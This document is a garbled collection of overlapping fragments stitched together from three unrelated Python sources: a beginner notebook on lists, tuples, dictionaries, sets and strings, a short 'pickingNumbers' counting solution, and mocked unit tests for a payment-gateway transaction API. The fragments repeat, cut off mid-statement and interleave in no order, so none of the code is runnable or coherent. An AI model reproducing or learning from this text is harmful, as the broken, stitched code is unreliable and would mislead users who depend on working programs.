odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) #", "In[27]: # Tuple having integers my_tuple = (1, 2, 3)", "# In[ ]: #List and function # In[6]: # empty", "{1: 'apple', 2: 'ball'} # dictionary with mixed keys my_dict", "'apple', 2: 'ball'} # dictionary with mixed keys my_dict =", "utf-8 # In[ ]: #List and function # In[6]: #", "'i', 'z') # Output: ('p', 'r', 'o', 'g', 'r', 'a',", "# delete entire list del my_list # In[14]: # Appending", "'z') # Output: ('p', 'r', 'o', 'g', 'r', 'a', 'm',", "In[21]: # Changing and adding Dictionary Elements my_dict = {'name':", "- all assignments are identical. String_var = 'Python' String_var =", "as a pair my_dict = dict([(1,'apple'), (2,'ball')]) # In[20]: #", "for retrieving elements my_dict = {'name': 'Jack', 'age': 26} #", "function # In[23]: my_set = {1, 2, 3} print(my_set) #", "dictionary with mixed keys my_dict = {'name': 'John', 1: [2,", "del my_list[1:5] print(my_list) # delete entire list del my_list #", "adding Dictionary Elements my_dict = {'name': 'Jack', 'age': 26} #", "'r', 'o', 'b', 'e'] # Output: p print(my_list[0]) # Output:", "item of mutable element can be changed my_tuple[3][0] = 9", "print(my_set) # In[24]: my_set = {1.0, \"Hello\", (1, 2, 3)}", "\"document\" with \"tutorial\" and store in another variable substr_var =", "be reassigned my_tuple = ('p', 'r', 'o', 'g', 'r', 'a',", "In[25]: # set cannot have duplicates my_set = {1, 2,", "'g', 'r', 'a', 'm', 'i', 'z') print(my_tuple) # In[37]: #String", "function # In[18]: y_dict = {} # dictionary with integer", "my_dict['address'] = 'Downtown' # Output: {'address': 'Downtown', 'age': 27, 'name':", "# Nested indexing print(n_list[0][1]) print(n_list[1][3]) # Error! Only integer can", "print(my_tuple[5]) # In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) # In[36]: #", "of mutable element can be changed my_tuple[3][0] = 9 #", "item del my_list[2] print(my_list) # delete multiple items del my_list[1:5]", "# In[28]: my_tuple = (\"hello\") print(type(my_tuple)) # In[30]: # Accessing", "my_list # In[14]: # Appending and Extending lists in Python", "11, 13]) print(odd) # In[13]: # Deleting list items my_list", "print(my_tuple[-6]) # In[36]: # Changing tuple values my_tuple = (4,", "= [1, 2, 3] # list with mixed data types", "keys my_dict = {'name': 'John', 1: [2, 4, 3]} #", "identical. String_var = 'Python' String_var = \"Python\" String_var = \"\"\"Python\"\"\"", "'b', 'l', 'e', 'm'] # delete one item del my_list[2]", "a pair my_dict = dict([(1,'apple'), (2,'ball')]) # In[20]: # get", "= 9 # However, item of mutable element can be", "o print(my_list[2]) # Output: e print(my_list[4]) # Nested List n_list", "tuple values my_tuple = (4, 2, 3, [6, 5]) #", "you to explore all the concepts of Python Strings!!! \"\"\"", "item assignment # my_tuple[1] = 9 # However, item of", "Output: e print(my_list[4]) # Nested List n_list = [\"Happy\", [2,", "are identical. 
String_var = 'Python' String_var = \"Python\" String_var =", "print(my_list) # delete multiple items del my_list[1:5] print(my_list) # delete", "my_tuple[3][0] = 9 # Output: (4, 2, 3, [9, 5])", "'age': 27, 'name': 'Jack'} print(my_dict) # In[22]: #Sets and its", "can be used for indexing print(my_list[4]) # In[9]: # Appending", "# In[37]: #String and its function # In[38]: # Python", "3} print(my_set) # In[24]: my_set = {1.0, \"Hello\", (1, 2,", "support item assignment # my_tuple[1] = 9 # However, item", "with \"tutorial\" and store in another variable substr_var = String_var.replace(\"document\",", "# nested list my_list = [\"mouse\", [8, 4, 6], ['a']]", "list with mixed data types my_list = [1, \"Hello\", 3.4]", "= {} # dictionary with integer keys my_dict = {1:", "to multiple lines String_var = \"\"\" This document will help", "Dictionary Elements my_dict = {'name': 'Jack', 'age': 26} # update", "2, 3] # list with mixed data types my_list =", "In[32]: print(my_tuple[-6]) # In[36]: # Changing tuple values my_tuple =", "= {'name': 'Jack', 'age': 26} # update value my_dict['age'] =", "# In[9]: # Appending and Extending lists in Python odd", "In[18]: y_dict = {} # dictionary with integer keys my_dict", "('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) #", "with Triple quotes Strings can extend to multiple lines String_var", "my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1]) # In[32]:", "print(my_tuple) # In[28]: my_tuple = (\"hello\") print(type(my_tuple)) # In[30]: #", "2: 'ball'} # dictionary with mixed keys my_dict = {'name':", "[1, 2, 3] # list with mixed data types my_list", "indexing my_list = ['p', 'r', 'o', 'b', 'e'] # Output:", "[2, 0, 1, 5]] # Nested indexing print(n_list[0][1]) print(n_list[1][3]) #", "cannot have duplicates my_set = {1, 2, 3, 4, 3,", "used for indexing print(my_list[4]) # In[9]: # Appending and Extending", "('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z') #", "[] for retrieving elements my_dict = {'name': 'Jack', 'age': 26}", "quotes Strings can extend to multiple lines String_var = \"\"\"", "'b', 'e'] # Output: p print(my_list[0]) # Output: o print(my_list[2])", "'o', 'g', 'r', 'a', 'm', 'i', 'z') # Output: ('p',", "(\"hello\") print(type(my_tuple)) # In[30]: # Accessing tuple elements using indexing", "# In[25]: # set cannot have duplicates my_set = {1,", "# Error! Only integer can be used for indexing print(my_list[4])", "print(my_dict.get('age')) # In[21]: # Changing and adding Dictionary Elements my_dict", "my_list[1:5] print(my_list) # delete entire list del my_list # In[14]:", "{'name': 'Jack', 'age': 26} # Output: Jack print(my_dict['name']) # Output:", "y_dict = {} # dictionary with integer keys my_dict =", "# my_tuple[1] = 9 # However, item of mutable element", "= \"Python\" String_var = \"\"\"Python\"\"\" # with Triple quotes Strings", "and its method # In[27]: # Tuple having integers my_tuple", "Nested indexing print(n_list[0][1]) print(n_list[1][3]) # Error! 
Only integer can be", "['p', 'r', 'o', 'b', 'l', 'e', 'm'] # delete one", "= ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')", "3)} print(my_set) # In[25]: # set cannot have duplicates my_set", "= ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6])", "{1, 2, 3} print(my_set) # In[24]: my_set = {1.0, \"Hello\",", "update value my_dict['age'] = 27 #Output: {'age': 27, 'name': 'Jack'}", "In[13]: # Deleting list items my_list = ['p', 'r', 'o',", "Deleting list items my_list = ['p', 'r', 'o', 'b', 'l',", "print(my_list) # delete entire list del my_list # In[14]: #", "# Output: 26 print(my_dict.get('age')) # In[21]: # Changing and adding", "my_tuple[1] = 9 # However, item of mutable element can", "= [] # list of integers my_list = [1, 2,", "print(n_list[1][3]) # Error! Only integer can be used for indexing", "In[7]: # nested list my_list = [\"mouse\", [8, 4, 6],", "In[22]: #Sets and its function # In[23]: my_set = {1,", "'Jack'} print(my_dict) # In[22]: #Sets and its function # In[23]:", "items my_list = ['p', 'r', 'o', 'b', 'l', 'e', 'm']", "Python string examples - all assignments are identical. String_var =", "list items my_list = ['p', 'r', 'o', 'b', 'l', 'e',", "Replace \"document\" with \"tutorial\" and store in another variable substr_var", "3.4] # In[7]: # nested list my_list = [\"mouse\", [8,", "odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[13]: # Deleting", "(1, 2, 3)} print(my_set) # In[25]: # set cannot have", "multiple lines String_var = \"\"\" This document will help you", "and its function # In[23]: my_set = {1, 2, 3}", "[1, \"Hello\", 3.4] # In[7]: # nested list my_list =", "list my_list = [\"mouse\", [8, 4, 6], ['a']] # In[11]:", "delete one item del my_list[2] print(my_list) # delete multiple items", "my_dict = dict([(1,'apple'), (2,'ball')]) # In[20]: # get vs []", "# Output: (4, 2, 3, [9, 5]) print(my_tuple) # Tuples", "the concepts of Python Strings!!! 
\"\"\" # Replace \"document\" with", "# In[30]: # Accessing tuple elements using indexing my_tuple =", "'Downtown', 'age': 27, 'name': 'Jack'} print(my_dict) # In[22]: #Sets and", "delete multiple items del my_list[1:5] print(my_list) # delete entire list", "Jack print(my_dict['name']) # Output: 26 print(my_dict.get('age')) # In[21]: # Changing", "delete entire list del my_list # In[14]: # Appending and", "del my_list # In[14]: # Appending and Extending lists in", "# However, item of mutable element can be changed my_tuple[3][0]", "[9, 5]) print(my_tuple) # Tuples can be reassigned my_tuple =", "my_dict = {'name': 'Jack', 'age': 26} # update value my_dict['age']", "'r', 'o', 'b', 'l', 'e', 'm'] # delete one item", "1: [2, 4, 3]} # using dict() my_dict = dict({1:'apple',", "integer can be used for indexing print(my_list[4]) # In[9]: #", "assignment # my_tuple[1] = 9 # However, item of mutable", "#Dictionary and function # In[18]: y_dict = {} # dictionary", "print(my_dict) # In[22]: #Sets and its function # In[23]: my_set", "= {'name': 'Jack', 'age': 26} # Output: Jack print(my_dict['name']) #", "2, 3, [9, 5]) print(my_tuple) # Tuples can be reassigned", "and its function # In[38]: # Python string examples -", "'John', 1: [2, 4, 3]} # using dict() my_dict =", "coding: utf-8 # In[ ]: #List and function # In[6]:", "Triple quotes Strings can extend to multiple lines String_var =", "# dictionary with integer keys my_dict = {1: 'apple', 2:", "2} print(my_set) # In[26]: #Tuple and its method # In[27]:", "multiple items del my_list[1:5] print(my_list) # delete entire list del", "types my_list = [1, \"Hello\", 3.4] # In[7]: # nested", "#List and function # In[6]: # empty list my_list =", "one item del my_list[2] print(my_list) # delete multiple items del", "reassigned my_tuple = ('p', 'r', 'o', 'g', 'r', 'a', 'm',", "In[6]: # empty list my_list = [] # list of", "[\"Happy\", [2, 0, 1, 5]] # Nested indexing print(n_list[0][1]) print(n_list[1][3])", "= {1, 2, 3, 4, 3, 2} print(my_set) # In[26]:", "In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) # In[36]: # Changing tuple", "lines String_var = \"\"\" This document will help you to", "print(my_dict) # add item my_dict['address'] = 'Downtown' # Output: {'address':", "function # In[38]: # Python string examples - all assignments", "5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[13]: #", "= {1: 'apple', 2: 'ball'} # dictionary with mixed keys", "(4, 2, 3, [9, 5]) print(my_tuple) # Tuples can be", "3, 5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[15]:", "retrieving elements my_dict = {'name': 'Jack', 'age': 26} # Output:", "# Changing and adding Dictionary Elements my_dict = {'name': 'Jack',", "27, 'name': 'Jack'} print(my_dict) # In[22]: #Sets and its function", "\"tutorial\" and store in another variable substr_var = String_var.replace(\"document\", \"tutorial\")", "# Output: e print(my_list[4]) # Nested List n_list = [\"Happy\",", "]: #List and function # In[6]: # empty list my_list", "Error! Only integer can be used for indexing print(my_list[4]) #", "elements my_dict = {'name': 'Jack', 'age': 26} # Output: Jack", "'i', 'z') print(my_tuple) # In[37]: #String and its function #", "# Python string examples - all assignments are identical. 
String_var", "can be reassigned my_tuple = ('p', 'r', 'o', 'g', 'r',", "3] # list with mixed data types my_list = [1,", "# In[22]: #Sets and its function # In[23]: my_set =", "Output: o print(my_list[2]) # Output: e print(my_list[4]) # Nested List", "# In[23]: my_set = {1, 2, 3} print(my_set) # In[24]:", "and Extending lists in Python odd = [1, 3, 5]" ]
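One behavior the get-vs-[] cell above does not show: on a missing key, get() returns None (or a supplied default) while [] raises KeyError. A small follow-up example, new here rather than part of the original notebook:

my_dict = {'name': 'Jack', 'age': 26}
# Output: None
print(my_dict.get('salary'))
# Output: 0 (explicit default)
print(my_dict.get('salary', 0))
try:
    print(my_dict['salary'])
except KeyError as err:
    # Output: missing key: 'salary'
    print('missing key:', err)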
[ "pickingNumbers(a): # Write your code here max = 0 for", "code here max = 0 for i in a: c", "here max = 0 for i in a: c =", "def pickingNumbers(a): # Write your code here max = 0", "for i in a: c = a.count(i) d = a.count(i-1)", "a: c = a.count(i) d = a.count(i-1) e = c+d", "e = c+d if e>max: max = e return max", "max = 0 for i in a: c = a.count(i)", "0 for i in a: c = a.count(i) d =", "your code here max = 0 for i in a:", "a.count(i) d = a.count(i-1) e = c+d if e>max: max", "= a.count(i) d = a.count(i-1) e = c+d if e>max:", "c = a.count(i) d = a.count(i-1) e = c+d if", "i in a: c = a.count(i) d = a.count(i-1) e", "= 0 for i in a: c = a.count(i) d", "= a.count(i-1) e = c+d if e>max: max = e", "# Write your code here max = 0 for i", "Write your code here max = 0 for i in", "a.count(i-1) e = c+d if e>max: max = e return", "in a: c = a.count(i) d = a.count(i-1) e =", "d = a.count(i-1) e = c+d if e>max: max =" ]
[ "= TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen):", "self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45", "'This transaction has been declined.' )) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self):", "'2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) ))", "'000000', 'response_code': '2', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code':", "'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS)", "TestCase import mock from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI from", "test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error try: self.api._make_call({'a': '1', 'b': '2'})", "= self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00'", "self.success params = {'a': '1', 'b': '2'} result = self.api._make_call(params)", "TransactionAPI from authorizesauce.data import Address, CreditCard from authorizesauce.exceptions import AuthorizeConnectionError,", "**kwargs): \"\"\"Python 2 version\"\"\" return None def get_content_charset(self, failobj=None, *args,", "'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) params =", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError,", "(params1, params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self):", "= self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&'", "def setUp(self): self.api = TransactionAPI('123', '456') self.success = lambda *args,", "{}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year),", "= self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&'", "self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result,", "self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({}, credit_card=self.credit_card)", "}) 
params = self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address': '45 Rose", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success result = self.api._make_call({u('\\xe3'):", "self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen')", "'This transaction has been declined.', 'transaction_id': '2171062816', } def _unicode_str(s):", "{}) params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date':", "get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python 3 version\"\"\" return failobj def", "MockResponse(BytesIO): class Headers(dict): def getparam(self, *args, **kwargs): \"\"\"Python 2 version\"\"\"", "= self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS)", "'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text': 'This transaction has", "*args, **kwargs) self.headers = self.Headers() SUCCESS = MockResponse( b'1;1;1;This transaction", "e: self.assertTrue(str(e).startswith( 'This transaction has been declined.' )) self.assertEqual(e.full_response, PARSED_ERROR)", "'45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country':", "'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS)", "'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "date.today().year + 10 self.credit_card = CreditCard('4111111111111111', self.year, 1, '911') self.address", "CreditCard from authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO): class", "= self.success # Test without specified amount result = self.api.settle('123456')", "def test_auth(self, urlopen): urlopen.side_effect = self.success result = self.api.auth(20, self.credit_card,", "self.address = Address('45 Rose Ave', 'Venice', 'CA', '90291') def test_basic_api(self):", "been declined.' 
)) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params", "import AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict): def getparam(self,", "approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response': 'P', 'authorization_code':", "'CA', 'x_zip': '90291', 'x_country': 'US', }) params = self.api._add_params( {},", "10 self.credit_card = CreditCard('4111111111111111', self.year, 1, '911') self.address = Address('45", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect = self.success result = self.api.void('123456')", "b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS =", "_are_params_eq(params1, params2): _params1, _params2 = map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1))", "setUp(self): self.api = TransactionAPI('123', '456') self.success = lambda *args, **kwargs:", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result,", "= self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code':", "urlencode from unittest2 import TestCase import mock from authorizesauce.apis.transaction import", "= MockResponse( b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y')", "SUCCESS self.error = lambda *args, **kwargs: ERROR.seek(0) or ERROR self.year", "'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45 Rose Ave',", "Test with transaction_id, amount result = self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0],", "transaction has been declined.', 'transaction_id': '2171062816', } def _unicode_str(s): if", "'20.00', 'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text': 'This transaction", "self.success # Test with transaction_id, amount result = self.api.credit('1111', '123456',", "*args, **kwargs): \"\"\"Python 2 version\"\"\" return None def get_content_charset(self, failobj=None,", "urlopen): urlopen.side_effect = self.success # Test with transaction_id, amount result", "'90291', 'x_country': 'US', }) params = self.api._add_params( {}, credit_card=self.credit_card, address=self.address", "Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response': 'N', 'authorization_code':", "'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect = 
self.success", "Address, CreditCard from authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO):", "self.success result = self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE'", "self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911',", "SUCCESS = MockResponse( b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;'", "transaction has been approved.', 'transaction_id': '2171062816', } ERROR = MockResponse(", "= { 'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount': '20.00',", "b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response': 'N',", "'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect = self.success result", "'N', 'response_reason_code': '2', 'response_reason_text': 'This transaction has been declined.', 'transaction_id':", "PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect = self.success params =", "Test without specified amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "Address('45 Rose Ave', 'Venice', 'CA', '90291') def test_basic_api(self): api =", "\\ AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict): def getparam(self, *args, **kwargs):", "self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect = self.success params", "as e: self.assertTrue(str(e).startswith( 'This transaction has been declined.' 
)) self.assertEqual(e.full_response,", "has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR =", "'US', }) params = self.api._add_params( {}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params,", "ERROR.seek(0) or ERROR self.year = date.today().year + 10 self.credit_card =", "b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code': '1',", "'x_card_code': '911', }) params = self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address':", "def test_credit(self, urlopen): urlopen.side_effect = self.success # Test with transaction_id,", "TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS)", "authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict): def", "result = self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&'", "self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&'", "from authorizesauce.data import Address, CreditCard from authorizesauce.exceptions import AuthorizeConnectionError, \\", "def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, {", "ERROR = MockResponse( b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose", "b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y')", "= CreditCard('4111111111111111', self.year, 1, '911') self.address = Address('45 Rose Ave',", "b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response': 'N', 'authorization_code': '000000', 'response_code':", "'&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) # Test with specified amount result", "BytesIO, binary_type, u from six.moves.urllib.parse import parse_qsl, urlencode from unittest2", "has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response':", "urlopen.side_effect = self.success result = self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "**kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers = self.Headers() SUCCESS = MockResponse(", "**kwargs: ERROR.seek(0) or ERROR self.year = date.today().year + 10 
self.credit_card", "return None def get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python 3 version\"\"\"", "'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text': 'This transaction has been declined.',", "test_basic_api(self): api = TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123',", "'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen):", "self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) #", "= { 'cvv_response': 'N', 'authorization_code': '000000', 'response_code': '2', 'amount': '20.00',", "PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data import 